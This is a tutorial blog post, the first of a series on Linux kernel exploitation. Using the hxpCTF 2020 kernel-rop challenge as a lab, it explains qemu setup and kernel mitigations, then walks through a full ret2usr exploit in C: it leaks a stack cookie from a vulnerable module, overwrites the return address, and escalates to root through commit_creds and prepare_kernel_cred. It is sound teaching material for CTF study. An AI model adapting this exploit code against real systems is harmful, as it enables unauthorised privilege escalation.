In this series, I’m going to write about some basics in Linux kernel exploitation that I’ve learned over the past few weeks: from basic environment configuration to some popular Linux kernel mitigations, and their corresponding exploitation techniques.
Requirements:
- Linux – A Linux machine
- Programming – High programming skills
Responsibility:
In this tutorial we will use hacking techniques, with the only purpose of learning. We do not promote its use for profit or improper purposes. We are not responsible for any damage or impairment that may be generated in the systems used. The responsibility lies entirely with the user of this tutorial.
Knowledge:
- Linux – Not applicable
- Programming – High
- Kali Linux – Not applicable
- Windows – Not applicable
- Networks – Bass
Overall Tutorial Level: Medium
Ideal for: Systems Engineers, Security Engineers, Pentesters
For the learning process, I used the environment provided by an hxpCTF 2020 challenge called kernel-rop to practice. Note that I only used it as a practice environment, this is not an actual writeup of the challenge itself (although the environment configuration in the last post may be the same as the one in the challenge, so you can call it a writeup). The reason I chose this particular challenge is because:
- The configuration is fairly standard and easy to modify to my practical needs.
- The error in the kernel module is extremely trivial and basic.
- The kernel version is fairly new (at the time I wrote this post, of course).
For me, this series serves as a reminder, an exploit template for me to look back on and reuse in the future, but if I could help anyone in their first steps in Linux kernel exploitation for just a little bit, I would be very happy.
So let’s start the first post of the series, where I demonstrate the most basic way to set up a Linux kernel pwn environment, and the most basic exploit technique.
Environment configuration
For a Linux kernel pwn challenge, our task is to exploit a vulnearable custom kernel module that is installed in the kernel at boot time. In most cases, the module will be given along with some files that ultimately use qemu as an emulator for a Linux system. However, in some rare cases, we may be given a VMWare or VirtualBox VM image, or we may not be given any emulation environment at all, but according to all the challenges I have sampled, those are quite rare, so I will only explain the common cases, which are emulated by qemu.
In particular, for the kernel-rop challenge, we are given a lot of files, but only these files are important for the qemu configuration:
- vmlinuz – the compressed Linux kernel, sometimes called bzImage, we can extract it into the ELF file of the real kernel called vmlinux.
- initramfs.cpio.gz – the Linux file system that is compressed with cpio and gzip, directories like /bin, /etc, … are stored in this file, also the vulnearable kernel module is likely to be included in the file system as well. For other challenges, this file could come in some other compression schemes.
- run.sh – the shell script containing the qemu run command, we can change the configuration of qemu and Linux boot here.
Let’s take a closer look at each of these files to find out what to do with them, one by one.
The kernel
The Linux kernel, often given under the name vmlinuz or bzImage, is the compressed version of the kernel image called vmlinux. There may be a few different compression schemes used such as gzip, bzip2, lzma, etc. Here I used a script called extract-image.sh to extract the ELF file from the kernel:
$ ./extract-image.sh ./vmlinuz > vmlinux
The reason for extracting the kernel image is to find the ROP gadgets inside it. If you are already familiar with pwning in userland, you know what ROP is, and in the kernel, it is not much different (we will see it in later posts). Personally I prefer to use ROPgadget to do the job:
$ ROPgadget --binary ./vmlinux > gadgets.txt
Note that unlike a simple userland program, the kernel image is HUGE. Therefore, ROPgadget will take a long time to find all the gadgets and you will have to wait for it, so it is wise to immediately look for gadgets at the beginning of the pwning process. It is also wise to save the output to a file, you do not want to run ROPgadget several times to search for several different gadgets.
The file system
Again, this is a compressed file, I use this decompress.sh script to decompress the file:
mkdir initramfs cd initramfs cp ../initramfs.cpio.gz . gunzip ./initramfs.cpio.gz cpio -idm < ./initramfs.cpio rm initramfs.cpio
After running the script, we have an initramfs directory that looks like the root directory of a file system on a Linux machine. We can also see that in this case, the vulnearable kernel module hackme.ko is also included in the root directory, we will copy it somewhere else to analyze it later.
The reason why we unzip this file is not only to get the vulnearable module, but also to modify something in this file system to our need. First of all, we can look in the /etc directory, because most of the startup scripts that run after boot are stored here. In particular, we look for the following line in one of the files (usually it will be rcS or inittab) and then modify it:
setuidgid 1000 /bin/sh # Modify it into the following setuidgid 0 /bin/sh
The purpose of this line is to generate a non-root shell with UID 1000 after booting. After modifying the UID to 0, we will have a root shell at boot time. You may ask: why should we do this? In fact, this seems quite contradictory, because our goal is to exploit the kernel module to get root, not to modify the file system (of course, we cannot modify the file system on the remote challenge server). The ultimate reason here is just to simplify the exploitation process. There are some files that contain useful information for us when we develop the exploit code, but require root access to read them, for example:
- /proc/kallsyms lists all addresses of all symbols loaded in the kernel.
- /sys/module/core/sections/.text shows the address of the .text section of the kernel, which is also its base address (although in the case of this challenge, there is no such /sys directory, you can retrieve the base address from /proc/kallsyms).
Secondly, we unzip the file system to put our exploit program on it later. After modifying it, I use this compress.sh script to compress it back into the given format:
gcc -o exploit -static $1 mv ./exploit ./initramfs cd initramfs find . -print0 \ | cpio --null -ov --format=newc \ | gzip -9 > initramfs.cpio.gz mv ./initramfs.cpio.gz ../
The first 2 lines are for compiling the exploit code and putting it into the file system.
Execution of the qemu script
Initially, the given run.sh looks like this:
qemu-system-x86_64 \ -m 128M \ -cpu kvm64,+smep,+smap \ -kernel vmlinuz \ -initrd initramfs.cpio.gz \ -hdb flag.txt \ -snapshot \ -nographic \ -monitor /dev/null \ -no-reboot \ -append "console=ttyS0 kaslr kpti=1 quiet panic=1"
Some notable flags are:
- -m specifies the memory size, if for some reason you cannot start the emulator, you can try to increase this size.
- -cpu specifies the CPU model, here we can add +smep and +smap for SMEP and SMAP mitigation features (more on this later).
- -kernel specifies the compressed kernel image.
- -initrd specifies the compressed file system.
- -append specifies additional boot options, this is also where we can enable/disable mitigation features.
The first thing to do here is to add the -s option. This option allows us to debug the emulator kernel remotely from our host machine. All we have to do is start the emulator normally, and then on the host machine, run:
$ gdb vmlinux (gdb) target remote localhost:1234
hen, we can debug the system kernel normally, just like when we attach gdb to a normal userland process.
The second thing we can do is modify the mitigation features to our practice needs. Of course, when we face a real challenge in a CTF, we may not want to do this, but again, this is me practicing different exploitation techniques in different scenarios, so modifying them is perfectly fine.
Linux Kernel Mitigation Features
Like mitigation features such as ASLR, stack canaries, PIE, etc. used by userland programs, the kernel also has its own set of mitigation features. Below are some of the popular and notable Linux kernel mitigation features that I consider when learning kernel pwn:
- Kernel stack cookies (or canaries) – is exactly the same as userland stack canaries. It is enabled in the kernel at compile time and cannot be disabled.
- Kernel Address Space Layout Randomization (KASLR) – also as ASLR in userland, randomizes the base address where the kernel is loaded each time the system boots. It can be enabled/disabled by adding kaslr or nokaslr in the -append option.
- Supervisor Mode Execution Protection (SMEP) – this feature marks all user pages in the page table as non-executable when the process is in kernel mode. In the kernel, this is enabled by setting the 20th bit of Control Register CR4. At startup, it can be enabled by adding +smep to -cpu, and disabled by adding nosmep to -append.
- Supervisor Mode Access Prevention (SMAP) – complementing SMEP, this feature marks all user pages in the page table as not accessible when the process is in kernel mode, meaning that they cannot be read or written too. In the kernel, this is enabled by setting bit 21 of Control Register CR4. At startup, it can be enabled by adding +smap to -cpu, and disabled by adding nosmap to -append.
- Kernel page table isolation (KPTI) – when this feature is enabled, the kernel separates the user space and kernel space page tables completely, instead of using a single set of page tables containing both user space and kernel space addresses. One set of page tables includes both kernel space and user space addresses, as before, but is only used when the system is running in kernel mode. The second set of page tables for use in user mode contains a copy of the user space and a minimal set of kernel space addresses. It can be enabled/disabled by adding kpti=1 or nopti to the -append option.
The way I learned, I started with the least mitigation features enabled: just the stack cookies, and then gradually added each of them one by one to learn different techniques that I can use in different cases. But first, let’s analyze the vulnearable hackme.ko module itself.
Kernel module analysis
The module is absolutely simple. First, in hackme_init(), it registers a device called hackme with the following operations: hackme_read, hackme_write, hackme_open and hackme_release. This means that we can communicate with this module by opening /dev/hackme and performing reads or writes to it.
Performing a read or write to the device will make a call to hackme_read() or hackme_write() in the kernel, their code is as follows (using IDA pro, some irrelevant parts are omitted):
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off) { //... int tmp[32]; //... if ( _size > 0x1000 ) { _warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size); BUG(); } _check_object_size(hackme_buf, _size, 0LL); if ( copy_from_user(hackme_buf, data, v5) ) return -14LL; _memcpy(tmp, hackme_buf); //... } ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off) { //... int tmp[32]; //... _memcpy(hackme_buf, tmp); if ( _size > 0x1000 ) { _warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size); BUG(); } _check_object_size(hackme_buf, _size, 1LL); v6 = copy_to_user(data, hackme_buf, _size) == 0; //... }
The bugs of these 2 functions are quite clear: they both read/write to a stack buffer 0x80 bytes long, but only warn of a buffer overflow if the size is greater than 0x1000. Using this bug, we can freely read/write to the kernel stack.
Now, let’s see what we can do with the above primitives to get root privileges, starting with the least mitigating features possible: stack cookies.
The simplest exploit – ret2usr
Recall that when we first learned userland pwn, most of us may have done a simple stack buffer overflow challenge where ASLR is disabled and the NX bit is not set. In this case, what we did was use a technique called ret2shellcode, where we put our shellcode somewhere on the stack, then debugged to find its address and overwrote the return address of the current function with what we found.
Return-to-user -also known as ret2usr- has its origin in a quite similar idea. Here, instead of putting shellcode on the stack, because we have full control of what is presented in the userland, we can put the piece of code we want the program flow to jump to in the userland itself. Then we simply overwrite the return address of the function being called in the kernel with that address. Since the vulnearable function is a kernel function, our code – even though it is in the user zone – is executed in kernel mode. Thus, we have already achieved arbitrary code execution.
To make this technique work, we will remove most of the mitigation functions in the qemu run script by removing +smep, +smap, kpti=1, kaslr and adding nopti, nokaslr.
As this is the first technique in the series, I will explain the exploitation process step by step.
Open the device
First of all, before we can interact with the module, we have to open it. The function to open the device is as simple as opening a normal file:
int global_fd; void open_dev(){ global_fd = open("/dev/hackme", O_RDWR); if (global_fd < 0){ puts("[!] Failed to open device"); exit(-1); } else { puts("[*] Opened device"); } }
After doing this, we can now read and write to global_fd.
Leaking stack cookies
Since we have an arbitrary read from the stack, filtering is trivial. The stack buffer tmp is 0x80 bytes long, and the stack cookie is immediately after it. Therefore, if we read the data in an unsigned long array (of which each element is 8 bytes long), the cookie will be at offset 16:
unsigned long cookie; void leak(void){ unsigned n = 20; unsigned long leak[n]; ssize_t r = read(global_fd, leak, sizeof(leak)); cookie = leak[16]; printf("[*] Leaked %zd bytes\n", r); printf("[*] Cookie: %lx\n", cookie); }
Overwrite the sender’s address
The situation here is the same as filtering, we will create an unsigned long array, and then overwrite the cookie with our filtered cookie at index 16. The important thing to note here is that unlike the userland programs, this kernel function actually pulls 3 registers from the stack, namely rbx, r12, rbp instead of just rbp (this can be clearly seen in the disassembly of the functions). Therefore, we have to put 3 dummy values after the cookie. Then the next value will be the return address we want our program to return to, which is the function we will elaborate on the user’s ground to get root privileges, I have called it escalate_privs:
void overflow(void){ unsigned n = 50; unsigned long payload[n]; unsigned off = 16; payload[off++] = cookie; payload[off++] = 0x0; // rbx payload[off++] = 0x0; // r12 payload[off++] = 0x0; // rbp payload[off++] = (unsigned long)escalate_privs; // ret puts("[*] Prepared payload"); ssize_t w = write(global_fd, payload, sizeof(payload)); puts("[!] Should never be reached"); }
The final concern here is what we actually write to that function to get root privileges.
Obtaining root privileges
Again, just as a reminder, our goal in kernel exploitation is not to open a shell via system(“/bin/sh”) or execve(“/bin/sh”, NULL, NULL), but rather to get root privileges on the system, and then open a root shell. Typically, the most common way to do this is to use the 2 functions called commit_creds() and prepare_kernel_cred(), which are functions that already reside in the kernel space code itself. What we need to do is to call the 2 functions like this:
commit_creds(prepare_kernel_cred(0))
Since KASLR is disabled, the addresses where these functions reside are constant at each boot. Therefore, we can easily obtain those addresses by reading the /proc/kallsyms file using these shell commands:
cat /proc/kallsyms | grep commit_creds -> ffffffff814c6410 T commit_creds cat /proc/kallsyms | grep prepare_kernel_cred -> ffffffff814c67f0 T prepare_kernel_cred
Then the code to achieve root privileges can be written as follows (it can be written in many different ways, it is simply calling 2 functions consecutively using the return value of one as the parameter of the other, I just saw this in a writeup and copied it):
void escalate_privs(void){ __asm__( ".intel_syntax noprefix;" "movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred "xor rdi, rdi;" "call rax; mov rdi, rax;" "movabs rax, 0xffffffff814c6410;" //commit_creds "call rax;" ... ".att_syntax;" ); }
Back to user’s land
In the current state of exploitation, if you simply go back to a piece of userland code to open a shell, you will be disappointed. The reason is because after running the above code, we are still running in kernel mode. To open a root shell, we have to go back to user mode.
Basically, if the kernel runs normally, it will fall back to user mode using 1 of these instructions (on x86_64): sysretq or iretq. The typical way most people use is through iretq, because as far as I know, sysretq is more complicated to get right. The iretq statement only requires that the stack be set up with 5 userland register values in this order: RIP|CS|RFLAGS|SP|SS.
The process maintains two different sets of values for these registers, one for user mode and one for kernel mode. Therefore, after terminating execution in kernel mode, it must revert to the user mode values for these registers. For RIP, we can simply set this as the address of the function that opens a shell. However, for the other registers, if we simply set them to random, the process may not continue execution as expected. To solve this problem, people have thought of a very clever way: save the state of these registers before entering kernel mode, and then reload them after gaining root privileges. The function to save their states is as follows:
void save_state(){ __asm__( ".intel_syntax noprefix;" "mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ".att_syntax;" ); puts("[*] Saved state"); }
And one more thing, on x86_64, one more instruction called swapgs must be called before iretq. The purpose of this instruction is also to swap the GS register between kernel mode and user mode. With all that information, we can finish the code to get root privileges, and then go back to user mode:
unsigned long user_rip = (unsigned long)get_shell; void escalate_privs(void){ __asm__( ".intel_syntax noprefix;" "movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred "xor rdi, rdi;" "call rax; mov rdi, rax;" "movabs rax, 0xffffffff814c6410;" //commit_creds "call rax;" "swapgs;" "mov r15, user_ss;" "push r15;" "mov r15, user_sp;" "push r15;" "mov r15, user_rflags;" "push r15;" "mov r15, user_cs;" "push r15;" "mov r15, user_rip;" "push r15;" "iretq;" ".att_syntax;" ); }
Finally we can call those pieces that we have elaborated one by one, in the correct order, to open a root shell:
int main() { save_state(); open_dev(); leak(); overflow(); puts("[!] Should never be reached"); return 0; }
Conclusion
This concludes my first post on my learning process of Linux kernel exploitation. In this post, I have demonstrated how to set up the environment for a Linux kernel pwn challenge, and also the simplest technique in kernel exploitation: ret2usr.
In the next post, I will gradually increase the difficulty by adding more and more mitigations, and show the corresponding technique to circumvent them.
Annex:
The script to extract kernel image is extract-image.sh.
The script to decompress the file system is decompress.sh.
The script to compile exploit and compress file system is compress.sh.
The full ret2usr
exploitation code is ret2usr.c.
Credits: Midas Blog (lkmidas.github.io)